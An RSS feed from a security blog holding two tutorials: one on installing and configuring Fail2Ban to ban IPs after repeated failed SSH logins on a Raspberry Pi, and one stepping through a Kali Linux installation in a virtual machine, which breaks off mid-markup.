<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>How to Archives - ITBlogSec.com</title>
	<atom:link href="https://itblogsec.com/category/how-to/feed/" rel="self" type="application/rss+xml" />
	<link>https://itblogsec.com/category/how-to/</link>
	<description>IT, network, security and hacking</description>
	<lastBuildDate>Thu, 14 Jan 2021 22:38:55 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>
	<item>
		<title>How to install Fail2Ban on the Raspberry Pi/Unix server</title>
		<link>https://itblogsec.com/how-to-install-fail2ban-on-the-raspberry-pi-unix-server/</link>
					<comments>https://itblogsec.com/how-to-install-fail2ban-on-the-raspberry-pi-unix-server/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Thu, 14 Jan 2021 22:19:36 +0000</pubDate>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Other]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[rasberry pi]]></category>
		<guid isPermaLink="false">https://itblogsec.com/?p=1335</guid>

					<description><![CDATA[<p>By opening ports from the Internet to your raspberry pi (ssh, http, ftp, https etc.), you are automatically becoming a victim of many hacker's attempts. Hackers are seeking exploits and trying to get access to your server. To protect you against such attacks, there is a tool called Fail2Ban. It supports a lot of services (sshd, apache, qmail, proftpd etc.) and can be integrated directly with your IPTables. By this tutorial, we will guide you via the whole process of how to protect against such attacks.   </p>
<p>The post <a href="https://itblogsec.com/how-to-install-fail2ban-on-the-raspberry-pi-unix-server/">How to install Fail2Ban on the Raspberry Pi/Unix server</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h3>How to install Fail2Ban on the Raspberry Pi/Unix server</h3>
<p style="text-align: justify;">By <strong>opening ports from the Internet</strong> to your raspberry pi <strong>(ssh, http, ftp, https etc.)</strong>, you are automatically becoming a <strong>victim</strong> of many <strong>hacker&#8217;s attempts</strong>. Hackers are seeking <strong>exploits</strong> and trying <strong>to get access to your server.</strong> To protect you against such attacks, there is a <strong>tool called Fail2Ban</strong>. It supports a lot of services (sshd, apache, qmail, proftpd etc.) and can be integrated directly with your <strong>IPTables</strong>. By this tutorial, we will guide you via the whole process of how to protect against such attacks.   </p>
<h5 style="text-align: justify;">Who is trying to access my raspberry pi?</h5>
<p style="text-align: justify;">If you think that your raspberry pi is safe and you do not need any tool to be installed, please <strong>check the content</strong> of the following <strong>file</strong>:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">cat /var/log/auth.log | grep 'Failed'</pre>
<p><a href="https://itblogsec.com/wp-content/uploads/2021/01/Pictures.png"><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-1346" src="https://itblogsec.com/wp-content/uploads/2021/01/Pictures.png" alt="" width="843" height="189" srcset="https://itblogsec.com/wp-content/uploads/2021/01/Pictures.png 843w, https://itblogsec.com/wp-content/uploads/2021/01/Pictures-300x67.png 300w, https://itblogsec.com/wp-content/uploads/2021/01/Pictures-768x172.png 768w, https://itblogsec.com/wp-content/uploads/2021/01/Pictures-585x131.png 585w" sizes="(max-width: 843px) 100vw, 843px" /></a></p>
<p style="text-align: justify;">As you can observe above, there are <strong>many password failures</strong>. Usually, the hacker bots are <strong>seeking exploits</strong>.  Each attempt <strong>consumes resources</strong> as your raspberry pi needs to evaluate each request. It is known as DoS attack. </p>
<p style="text-align: justify;">Hackers can try also a <b>brute-force attack. </b> Such an attack consists of an attacker submitting many passwords or passphrases with the hope of eventually <strong>guessing a combination correctly</strong>. The attacker <strong>systematically</strong> <strong>checks</strong> all <strong>possible passwords</strong> and passphrases until the correct one is found. </p>
<h5 style="text-align: justify;">What is Fail2Ban and how does it work?</h5>
<p style="text-align: justify;">Fail2Ban is a <strong>daemon</strong> that <strong>scans access log files</strong> and it bans IP addresses that <strong>show malicious signs</strong>. It <strong>protects</strong> you <strong>against</strong> <strong>too many password failures</strong> as shown above. </p>
<p style="text-align: justify;">It is a <strong>must have tool</strong> to <strong>protect</strong> your <strong>from intruders</strong> to your server or network <strong>especially</strong> if you allow <strong>outside SSH</strong> traffic or any traffics from an outside network to your Raspberry Pi. Fail2Ban tool <strong>supports many different services</strong> <strong>(sshd, apache, qmail, proftpd, sasl, asterisk, etc) </strong>and can be <strong>integrated</strong> with your <strong>IPTables</strong>.</p>
<p style="text-align: justify;"><strong>Installation</strong> of Fail2Ban is very <strong>easy</strong> to install and basic setup <strong>will drastically improve security</strong> on your Raspberry Pi. Fail2Ban works by <strong>checking your access logs for failures</strong> and depending on the settings you setup, <strong>it will ban</strong> or timeout an IP Address for a certain amount of time. Fail2Ban tool can easily protect your raspberry pi against very known brute-force and DoS attacks.</p>
<h5 style="text-align: justify;">How can I protect myself?</h5>
<p style="text-align: justify;">Very easy, by installing of Fail2Ban on your raspberry pi. We will first <strong>install Fail2Ban</strong> by typing the following commands:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">sudo apt-get update
sudo apt-get install fail2ban</pre>
<p style="text-align: justify;">By doing that, you have Fail2Ban already installed. The <strong>configuration file</strong> is located at <strong>&#8216;/etc/fail2ban/jail.local&#8217;</strong>. If you want to change some parameters, you can simply <strong>modify this file</strong> and <strong>restart the service</strong> to take immediate effect.</p>
<p style="text-align: justify;">Let&#8217;s edit our SSH Fail2Ban configurations. Open up the &#8216;/etc/fail2ban/jail.local&#8217; file with the following command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">sudo nano /etc/fail2ban/jail.local</pre>
<p style="text-align: justify;">Your <strong>jail.local file should already contain</strong> some <strong>pre-defined config.</strong> We will need to tweak it a little bit. Find a section in the file called <strong>[sshd]</strong> and paste/modify accordingly:</p>
<div id="crayon-5fdbb26ace0f1756477449-1" class="crayon-line">
<div id="crayon-5fdbb26ace0f1756477449-1" class="crayon-line">
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">[sshd]

enabled = true
filter = sshd
port = ssh
logpath = /var/log/auth.log
bantime = 86400
banaction = iptables-allports
findtime = 900
maxretry = 3
backend = %(sshd_backend)s</pre>
<p style="text-align: justify;">After pasting the settings hit CTRL+X and then Y to save the configuration file. Below is what each line in the configuration means and what you can edit:</p>
<p style="text-align: justify;"><strong><em>enabled</em></strong>: Determines whether or not the filter is turned on.</p>
<p style="text-align: justify;"><em><strong>filter</strong></em>: The name of the file located in ‘/etc/fail2ban/filter.d’ that contains the failregex information used to parse log files appropriately.</p>
<p style="text-align: justify;"><em><strong>port</strong></em>: The port Fail2Ban should be referencing in regards to the service. If using the default port, then the service name can be placed here. If you changed your SSH port to something else you would need to write the new port number here.</p>
<p style="text-align: justify;"><em><strong>logpath</strong></em>: The path to your log file.</p>
<p style="text-align: justify;"><em><strong>bantime</strong></em>: The length of time in seconds that the IP Address will be banned for. In my example I used ‘86400’ seconds which would be 24 hours. If you want to ban an IP Address permanently then you will set the <em><strong>bantime</strong></em> to ‘-1’.</p>
<p style="text-align: justify;"><em><strong>banaction</strong></em>: The action to take when banning an IP Address.</p>
<p style="text-align: justify;"><em><strong>findtime</strong></em>: The length of time between login attempts before a ban is set. For example, if Fail2Ban is set to ban an IP after three failed log-in attempts, those three attempts must occur within the set <em><strong>findtime</strong></em> limit. The <em><strong>findtime</strong></em> value should be a set number of seconds.</p>
<p style="text-align: justify;"><em><strong>maxretry</strong></em>: How many attempts can be made to access the server from a single IP before a ban is imposed.</p>
<p style="text-align: justify;">After modification of the configuration file, you need to restart the service to take changes affect:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">sudo service fail2ban restart</pre>
<p style="text-align: justify;">After the restart of service, <strong>your raspberry pi is already protected</strong> and all <strong>DoS</strong> or <strong>brute-force attempts</strong> will be <strong>banned</strong>. The list of all <strong>banned IPs</strong> is <strong>cleared</strong> upon<strong> restarting Fail2Ban</strong> or <strong>rebooting</strong> the <strong>server</strong>. If you manage to ban yourself, you can simply reboot the server or use the command below:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">sudo fail2ban-client set sshd unbanip &lt;IP-YOU-WANT-TO-UNBAN&gt;</pre>
<p style="text-align: justify;">You can <strong>check</strong> your <strong>IPTables</strong> <strong>list</strong> with the following command to see <strong>all your banned IP</strong> addresses:</p>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="godzilla">sudo iptables -L -n --line</pre>
<p><span style="font-size: 8pt;"><strong>source:</strong> <a href="https://en.wikipedia.org/wiki/Brute-force_attack" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Brute-force_attack</a>, <a href="https://www.fail2ban.org/wiki/index.php/Main_Page" target="_blank" rel="noopener">https://www.fail2ban.org/wiki/index.php/Main_Page</a></span></p>
</div>
<p>The post <a href="https://itblogsec.com/how-to-install-fail2ban-on-the-raspberry-pi-unix-server/">How to install Fail2Ban on the Raspberry Pi/Unix server</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itblogsec.com/how-to-install-fail2ban-on-the-raspberry-pi-unix-server/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hacking for beginners #1 &#8211; Install the Kali Linux</title>
		<link>https://itblogsec.com/hacking-for-beginners-1-install-the-kali-linux/</link>
					<comments>https://itblogsec.com/hacking-for-beginners-1-install-the-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 05 May 2020 08:33:06 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[kali linux]]></category>
		<guid isPermaLink="false">https://itblogsec.com/?p=1240</guid>

					<description><![CDATA[<p>In this tutorial series called Hacking for beginners, we are going to teach you how to use the most powerful open-source Linux system called Kali Linux. This tutorial gives a complete understanding of Kali Linux and explains how to use it in practice for various hacker activities. We are focusing on step-by-step guidelines with the best explanation so even beginners and hacking dummies can understand  and follow it.</p>
<p>The post <a href="https://itblogsec.com/hacking-for-beginners-1-install-the-kali-linux/">Hacking for beginners #1 &#8211; Install the Kali Linux</a> appeared first on <a href="https://itblogsec.com">ITBlogSec.com</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;">In this tutorial series called <strong>Hacking for beginners</strong>, we are going to teach you how to use the most <strong>powerful open-source Linux system</strong> called <strong><a href="https://www.kali.org" target="_blank" rel="noopener noreferrer">Kali Linux</a>. </strong>This tutorial gives a <strong>complete</strong> <strong>understanding</strong> of <strong>Kali Linux</strong> and explains how to use it <strong>in practice for various hacker activities</strong>. We are focusing on step-by-step guidelines with the best explanation so even beginners and hacking dummies can understand  and follow it. Be polite, be ethical and use it only for education purposes! <strong>Enjoy and stay tuned for the next episodes <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> </strong></p>
<h3 style="text-align: justify;">What you can learn </h3>
<p style="text-align: justify;">If you want to start with hacking, first you need <strong>to have some hacking tools available</strong>. The best option for that purpose is using Kali Linux what is linux distribution specially designed to be used for hacking activities. As the part of our hacking tutorials for beginners, we are starting with the <strong>#1</strong> where you can find exact steps <strong>how to install Kali linux on MacOS using Parallels Desktop or Virtual Box</strong>. Of course, you can use <strong>any virtualization platform</strong> you want, even there is ARM Kali Linux image available for <a href="https://itblogsec.com/build-own-openvpn-server-by-using-raspberry-pi-12/" target="_blank" rel="noopener noreferrer"><strong>rapsbperry PI</strong></a>, you can download it <a href="https://www.offensive-security.com/kali-linux-arm-images/" target="_blank" rel="noopener noreferrer">here</a>. </p>
<h3 style="text-align: justify;"><strong>1: Download kali linux image</strong></h3>
<p><strong>&#8211; use official webpage https://www.kali.org/downloads/</strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-13.42.16.png"><img decoding="async" class="aligncenter size-full wp-image-1242" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-13.42.16.png" alt="" width="553" height="168" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-13.42.16.png 553w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-13.42.16-300x91.png 300w" sizes="(max-width: 553px) 100vw, 553px" /></a></p>
<p>&nbsp;</p>
<h3><strong>2: Import Kali linux image </strong></h3>
<p><strong>&#8211; here is example by using Parallels Desktop &#8211; choose Debian GNI/Linux (the same applicable for for Virtual Box)</strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.00.46.png"><img decoding="async" class="aligncenter size-full wp-image-1248" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.00.46.png" alt="" width="865" height="578" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.00.46.png 865w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.00.46-300x200.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.00.46-768x513.png 768w" sizes="(max-width: 865px) 100vw, 865px" /></a></p>
<h3><strong>3: Choose name and location </strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.01.08.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1251" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.01.08.png" alt="" width="859" height="571" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.01.08.png 859w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.01.08-300x199.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.01.08-768x511.png 768w" sizes="(max-width: 859px) 100vw, 859px" /></a></p>
<h3><strong>4: Select type of installation (Graphical install)</strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.19.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1252" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.19.png" alt="" width="633" height="514" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.19.png 633w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.19-300x244.png 300w" sizes="(max-width: 633px) 100vw, 633px" /></a></p>
<p>&nbsp;</p>
<h3><strong>5: Select language for installation</strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.53.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1253" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.53.png" alt="" width="1017" height="797" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.53.png 1017w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.53-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.03.53-768x602.png 768w" sizes="(max-width: 1017px) 100vw, 1017px" /></a></p>
<h3><strong>6: Wait for installation </strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.04.23.png"><img loading="lazy" decoding="async" class="aligncenter wp-image-1255 size-full" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.04.23-e1588674488352.png" alt="" width="1016" height="314" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.04.23-e1588674488352.png 1016w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.04.23-e1588674488352-300x93.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.04.23-e1588674488352-768x237.png 768w" sizes="(max-width: 1016px) 100vw, 1016px" /></a></p>
<h3><strong>7: Type hostname of your Kali linux system</strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.17.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1256" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.17.png" alt="" width="1018" height="798" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.17.png 1018w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.17-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.17-768x602.png 768w" sizes="(max-width: 1018px) 100vw, 1018px" /></a></p>
<h3><strong>8: Type domain name</strong></h3>
<p><strong>&#8211; if you do not use domain, just leave it blank</strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.30.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1257" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.30.png" alt="" width="1019" height="795" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.30.png 1019w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.30-300x234.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.30-768x599.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /></a></p>
<h3><strong>9: Set-up user and password </strong></h3>
<p><strong>&#8211; (always use strong password)</strong></p>
<h3><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.51.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1258" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.51.png" alt="" width="1014" height="798" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.51.png 1014w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.51-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.05.51-768x604.png 768w" sizes="(max-width: 1014px) 100vw, 1014px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.27.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1259" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.27.png" alt="" width="1015" height="792" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.27.png 1015w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.27-300x234.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.27-768x599.png 768w" sizes="(max-width: 1015px) 100vw, 1015px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.58.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1260" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.58.png" alt="" width="1013" height="796" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.58.png 1013w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.58-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.06.58-768x603.png 768w" sizes="(max-width: 1013px) 100vw, 1013px" /></a><strong>10: Select your time-zone</strong> </h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.15.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1261" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.15.png" alt="" width="1013" height="796" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.15.png 1013w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.15-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.15-768x603.png 768w" sizes="(max-width: 1013px) 100vw, 1013px" /></a></p>
<h3><strong>11: Partition and format your virtual disk </strong></h3>
<p><strong>&#8211; please select: Guided &#8211; use entire disk</strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.57.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1262" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.57.png" alt="" width="1018" height="798" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.57.png 1018w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.57-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.07.57-768x602.png 768w" sizes="(max-width: 1018px) 100vw, 1018px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.13.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1263" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.13.png" alt="" width="1017" height="799" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.13.png 1017w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.13-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.13-768x603.png 768w" sizes="(max-width: 1017px) 100vw, 1017px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.25.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1264" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.25.png" alt="" width="1016" height="797" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.25.png 1016w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.25-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.25-768x602.png 768w" sizes="(max-width: 1016px) 100vw, 1016px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.36.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1265" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.36.png" alt="" width="1015" height="798" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.36.png 1015w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.36-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.36-768x604.png 768w" sizes="(max-width: 1015px) 100vw, 1015px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.56.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1266" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.56.png" alt="" width="1016" height="792" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.56.png 1016w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.56-300x234.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.08.56-768x599.png 768w" sizes="(max-width: 1016px) 100vw, 1016px" /></a></p>
<h3><strong>12: Select software you want to install </strong></h3>
<p><strong>&#8211; of course later you can install any kind of software you want</strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.20.34.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1267" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.20.34.png" alt="" width="1015" height="800" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.20.34.png 1015w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.20.34-300x236.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.20.34-768x605.png 768w" sizes="(max-width: 1015px) 100vw, 1015px" /></a></p>
<h3><strong>13: Install GRUB boot loader</strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.13.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1268" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.13.png" alt="" width="1020" height="797" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.13.png 1020w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.13-300x234.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.13-768x600.png 768w" sizes="(max-width: 1020px) 100vw, 1020px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.28.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1269" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.28.png" alt="" width="1019" height="793" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.28.png 1019w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.28-300x233.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.28-768x598.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.42.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1270" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.42.png" alt="" width="1019" height="799" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.42.png 1019w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.42-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.45.42-768x602.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /></a><strong> </strong></p>
<h3><strong>14: Wait for installation to be finished</strong></h3>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.47.32.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-1271" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.47.32.png" alt="" width="1018" height="799" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.47.32.png 1018w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.47.32-300x235.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.47.32-768x603.png 768w" sizes="(max-width: 1018px) 100vw, 1018px" /></a></p>
<h3><strong>15: Congratulations! We are done.</strong></h3>
<p><strong>&#8211; Now your Kali linux system is ready to be used for your hacking practice </strong></p>
<p><a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1272" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31-1024x602.png" alt="" width="1024" height="602" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31-1024x602.png 1024w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31-300x176.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31-768x452.png 768w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.48.31.png 1275w" sizes="(max-width: 1024px) 100vw, 1024px" /></a> <a href="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-1273" src="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38-1024x603.png" alt="" width="1024" height="603" srcset="https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38-1024x603.png 1024w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38-300x177.png 300w, https://itblogsec.com/wp-content/uploads/2020/05/Screenshot-2020-04-29-at-16.49.38-768x452.png 768w, 